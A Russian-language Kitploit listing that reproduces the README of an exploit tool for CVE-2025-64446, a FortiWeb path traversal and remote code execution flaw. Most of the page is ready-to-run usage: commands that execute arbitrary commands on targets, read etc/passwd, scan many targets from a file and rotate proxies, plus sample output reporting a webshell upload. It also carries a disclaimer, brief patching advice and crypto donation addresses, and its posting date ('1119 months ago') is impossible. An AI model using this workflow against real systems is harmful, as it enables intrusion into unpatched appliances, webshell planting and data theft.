Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-64446-fortiweb-exploit — Инструмент для исследования безопасности для обнаружения и тестирования CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability) | Kitploit
Инструменты/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Инструмент для исследования безопасности для обнаружения и тестирования CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)

Репозиторий
1119 месяцев назадЕщё не проверено

CVE-2025-64446 Эксплойт обхода пути и удаленного выполнения кода в Fortinet FortiWeb

Инструмент для исследования безопасности, предназначенный для обнаружения и тестирования уязвимости CVE-2025-64446 в брандмауэре веб-приложений Fortinet FortiWeb (WAF). Эта критическая уязвимость нулевого дня, связанная с обходом пути, активно эксплуатируется в реальных условиях и позволяет неаутентифицированным злоумышленникам обходить средства защиты и выполнять произвольный код.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.

📋 Обзор

CVE-2025-64446 — это критическая уязвимость нулевого дня, связанная с обходом пути в Fortinet FortiWeb WAF, которая активно эксплуатируется в реальных условиях. Эта уязвимость позволяет неаутентифицированным злоумышленникам обходить средства защиты с помощью атак обхода пути, что может привести к удаленному выполнению кода, доступу к конфигурационным файлам и полной компрометации системы.

Оценка CVSS: 9.8 (Критическая)
Статус: Активно эксплуатируется в реальных условиях
CISA KEV: Добавлен в каталог известных эксплуатируемых уязвимостей
Патч: FG-IR-25-910
Затронутый продукт: Fortinet FortiWeb WAF

🔍 Возможности

  • Автоматическое обнаружение FortiWeb: Определяет развертывания FortiWeb WAF
  • Тестирование обхода пути: Проверяет множество вариантов полезной нагрузки для обхода пути
  • Подтверждение уязвимости: Подтверждает уязвимость CVE-2025-64446
  • Доступ к конфигурационным файлам: Пытается прочитать конфигурационные файлы FortiWeb
  • Развертывание веб-шелла: Демонстрирует возможность загрузки веб-шелла
  • Выполнение команд: Выполняет произвольные команды (для авторизованного тестирования)
  • Поддержка многопоточности: Сканирование нескольких целей параллельно
  • Поддержка прокси: Обход дополнительных ограничений безопасности
  • Экспорт в JSON: Подробные результаты в формате JSON
  • Включен POC-скрипт: Простая демонстрация доказательства концепции

📦 Установка

Предварительные требования

  • Python 3.6 или выше
  • pip (менеджер пакетов Python)

Быстрая установка

root@kitploit:~
# Клонируйте репозиторий
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Установите зависимости
pip install -r requirements.txt

# Сделайте скрипты исполняемыми (опционально)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Альтернатива: Прямая загрузка

root@kitploit:~
# Загрузите скрипты
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Установите зависимости
pip install requests

🚀 Использование

Базовое использование

root@kitploit:~
# Одна цель
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Выполнение пользовательской команды
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Несколько целей из файла
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# С многопоточностью для более быстрого сканирования
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Подробный вывод для отладки
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Использование прокси

root@kitploit:~
# Один прокси
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Несколько прокси из файла
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

POC-скрипт

root@kitploit:~
# Базовый POC-тест
python3 cve_2025_64446_poc.py -u http://target.com

# Тестирование конкретного файла
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Подробный вывод
python3 cve_2025_64446_poc.py -u http://target.com -v

Параметры командной строки

root@kitploit:~
-u, --url          Целевой URL
-f, --file         Файл, содержащий целевые URL (по одному на строку)
-c, --command      Команда для выполнения (по умолчанию: id)
-t, --threads      Количество потоков (по умолчанию: 1)
-o, --output       Выходной файл (по умолчанию: uknf_fortiweb_results.json)
-v, --verbose      Включить подробное логирование
--proxy            URL прокси (например, http://127.0.0.1:8080)
--proxy-list       Файл, содержащий URL прокси (по одному на строку)

📊 Вывод

Скрипт генерирует JSON-файл с подробными результатами:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Как это работает

  1. Фаза обнаружения: Сканирует индикаторы FortiWeb WAF (заголовки, содержимое, страницы ошибок)
  2. Тестирование уязвимости: Проверяет множество вариантов полезной нагрузки для обхода пути
  3. Подтверждение обхода пути: Подтверждает успешный доступ к файлу
  4. Доступ к конфигурации: Пытается прочитать конфигурационные файлы FortiWeb
  5. Эксплуатация: Если уязвим, демонстрирует возможность RCE через развертывание веб-шелла

🛡️ Смягчение последствий

Если вы используете FortiWeb WAF:

  1. Немедленно установите обновления безопасности:

    root@kitploit:~
    # Проверьте текущую версию
    show system status
    
    # Обновитесь до последней версии
    execute upgrade <firmware-file>
    
    • Ссылка: FG-IR-25-910
  2. Сегментация сети:

    • Ограничьте доступ к интерфейсу управления FortiWeb
    • Внедрите сетевые ACL
    • Используйте VPN для административного доступа
  3. Усиление конфигурации:

    • Отключите ненужные функции
    • Внедрите строгие средства контроля доступа
    • Включите комплексное ведение журналов и мониторинг
  4. Требования CISA:

    • Федеральные агентства должны установить исправления в течение 7 дней
    • Следите за каталогом CISA KEV на предмет обновлений

📚 Ссылки

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • Каталог CISA KEV: CVE-2025-64446
  • Блог Tenable: Анализ CVE-2025-64446

📖 Примеры

Пример 1: Сканирование одной цели

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Пример 2: Несколько целей с выводом

root@kitploit:~
# Создайте файл с целями
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Запустите сканирование
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Пример 3: Выполнение пользовательской команды

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Пример 4: Использование прокси

root@kitploit:~
# Один прокси
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Несколько прокси из файла
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Пример 5: Тестирование POC

root@kitploit:~
# Базовый POC
python3 cve_2025_64446_poc.py -u https://example.com

# Тестирование конкретного файла
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Вклад

Приветствуются любые вклады! Пожалуйста, не стесняйтесь отправлять Pull Request.

  1. Сделайте форк репозитория
  2. Создайте свою ветку функции (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте в ветку (git push origin feature/AmazingFeature)
  5. Откройте Pull Request

🐛 Проблемы

Если вы столкнулись с какими-либо проблемами или у вас есть предложения, пожалуйста, откройте issue на GitHub.

📝 Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

⭐ История звезд

Если вы считаете этот инструмент полезным, пожалуйста, поставьте ему звезду на GitHub!

⚖️ Правовая информация

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этой программой. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем.

🙏 Благодарности

  • Первоначальный репортер уязвимости и исследователи безопасности
  • Fortinet PSIRT за раскрытие уязвимости
  • CISA за поддержание каталога KEV
  • Сообщество безопасности за продолжающиеся исследования

💰 Пожертвования

Если вы нашли этот инструмент полезным и хотели бы поддержать проект:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Спасибо за вашу поддержку! 🙏

Скачать инструмент